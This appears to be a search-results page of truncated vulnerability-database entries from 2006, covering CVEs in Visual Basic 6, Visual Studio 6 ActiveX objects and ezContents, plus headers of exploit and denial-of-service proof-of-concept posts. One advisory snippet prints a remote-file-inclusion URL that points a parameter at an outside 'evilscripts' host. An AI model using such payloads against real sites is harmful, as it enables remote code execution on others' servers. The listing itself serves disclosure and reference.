8759 matches found
Exhibit Engine 1.5 RC 4 - photo_comment.php File Inclusion
Exhibit Engine 1.5 RC 4 - photocomment.php File Inclusion ' ' EXPLOIT coded by Kacper in Visual Basic ;- ' '::::::::: :::::::::: ::: ::: ::::::::::: ::: ':+: :+: :+: :+: :+: :+: :+: '+:+ +:+ +:+ +:+ +:+ +:+ +:+ '++ +:+ +++:++ ++ +:+ ++ ++ '++ ++ ++ ++ ++ ++ ++ '+ + + +++ + + ' ':::::::::::...
Opial AV Download Management 1.0 - index.php Cross-Site Scripting
Opial AV Download Management 1.0 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/20174/info Opial Audio/Visual Download Management is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. An attacker may levera...
Opial AV Download Management 1.0 - 'index.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/20174/info Opial Audio/Visual Download Management is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. An attacker may leverage this issue to have arbitrary script code execute in the browser...
CVE-2006-4732
Unspecified vulnerability in Microsoft Visual Basic VB 6 has an unknown impact "overflow" via a project that contains a certain Click event procedure, as demonstrated using the msgbox function and the VB.Label object...
CVE-2006-4732
The CVE concerns Microsoft Visual Basic 6 (VB6). A vulnerability arises in a project containing a specific Click event procedure (demonstrated with msgbox and VB.Label) that causes an unspecified overflow. The affected component is the VB6 runtime/IDE context where the Click event triggers the ov...
CVE-2006-4494
Microsoft Visual Studio 6.0 allows remote attackers to cause a denial of service memory corruption and possibly execute arbitrary code by instantiating certain Visual Studio 6.0 ActiveX COM Objects in Internet Explorer, including 1 tcprops.dll, 2 fp30wec.dll, 3 mdt2db.dll, 4 mdt2qd.dll, and 5...
CVE-2006-4494
Microsoft Visual Studio 6.0 is affected. The vulnerability arises when remote attackers instantiate specific Visual Studio 6.0 ActiveX COM objects in Internet Explorer (tcprops.dll, fp30wec.dll, mdt2db.dll, mdt2qd.dll, vi30aut.dll), causing memory corruption that can lead to a denial of service a...
CVE-2006-4494
Microsoft Visual Studio 6.0 allows remote attackers to cause a denial of service memory corruption and possibly execute arbitrary code by instantiating certain Visual Studio 6.0 ActiveX COM Objects in Internet Explorer, including 1 tcprops.dll, 2 fp30wec.dll, 3 mdt2db.dll, 4 mdt2qd.dll, and 5...
CVE-2006-4477
Multiple PHP remote file inclusion vulnerabilities in Visual Shapers ezContents 2.0.3 allow remote attackers to execute arbitrary PHP code via an empty GLOBALSrootdp parameter and an ftps URL in the 1 GLOBALSadminhome parameter in a diary/eventlist.php, b gallery/gallerysummary.php, c...
CVE-2006-4478
SQL injection vulnerability in headeruserdata.php in Visual Shapers ezContents 2.0.3 allows remote attackers to execute arbitrary SQL commands via the groupname parameter...
CVE-2006-4479
CVE-2006-4479: Affected software is Visual Shapers ezContents 2.0.3; vulnerability in loginreq2.php allows cross-site scripting via the subgroupname parameter. Impact: remote attackers can inject arbitrary script/HTML. The connected documents do not provide exploit details or a specific remediati...
CVE-2006-4478
CVE-2006-4478 describes an SQL injection in Visual Shapers ezContents 2.0.3, affecting headeruserdata.php via the groupname parameter. The underlying issue permits remote attackers to inject arbitrary SQL commands. Documented impact indicates potential data exposure, modification, or other SQL-le...
CVE-2006-4478
SQL injection vulnerability in headeruserdata.php in Visual Shapers ezContents 2.0.3 allows remote attackers to execute arbitrary SQL commands via the groupname parameter...
CVE-2006-4477
Multiple PHP remote file inclusion vulnerabilities in Visual Shapers ezContents 2.0.3 allow remote attackers to execute arbitrary PHP code via an empty GLOBALSrootdp parameter and an ftps URL in the 1 GLOBALSadminhome parameter in a diary/eventlist.php, b gallery/gallerysummary.php, c...
CVE-2006-4479
Cross-site scripting XSS vulnerability in loginreq2.php in Visual Shapers ezContents 2.0.3 allows remote attackers to inject arbitrary web script or HTML via the subgroupname parameter...
CVE-2006-4477
CVE-2006-4477 involves multiple PHP remote file inclusion vulnerabilities in Visual Shapers ezContents 2.0.3. The issue allows remote attackers to execute arbitrary PHP code by supplying an empty GLOBALS[rootdp] or a URL in the GLOBALS[admin_home] parameter (across files: diary/event_list.php, ga...
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)
// Microsoft Windows PNG IHDR block DoS PoC 2 // // CPU load goes to 100% until you restart explorer.exe // // Bug found by: Preddy ? // // Compiled and tested with Windows XP SP2, Visual studio 6, no psdk // // Header: 89 50 4e 47 0d 0a // // Greets: scoper, HCorny, eleet aka takker01 and...
visualevents11.txt
title: Visual Events Calendar v1.1 cfgdir Remote Inclusion Vulnerability Author: xoron script: Visual Events Calendar v1.1 Class : Remote cont@ct: x0r0nathotmaildotcom CODE: include $cfgdir."customizetext.php"; Exploit: http://www.site.com/path/calendar.php?cfgdir=http://evilscripts? Thanx :...
MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2)
Exploit for unknown platform in category dos / poc ==================================================================== MS Windows PNG File IHDR Block Denial of Service Exploit PoC c 2 ==================================================================== // Microsoft Windows PNG IHDR block DoS PoC...
Microsoft Windows - .png IHDR Block Denial of Service (PoC) (2)
Microsoft Windows - .png IHDR Block Denial of Service PoC 2 // Microsoft Windows PNG IHDR block DoS PoC 2 // // CPU load goes to 100% until you restart explorer.exe // // Bug found by: Preddy ? // // Compiled and tested with Windows XP SP2, Visual studio 6, no psdk // // Header: 89 50 4e 47 0d 0a...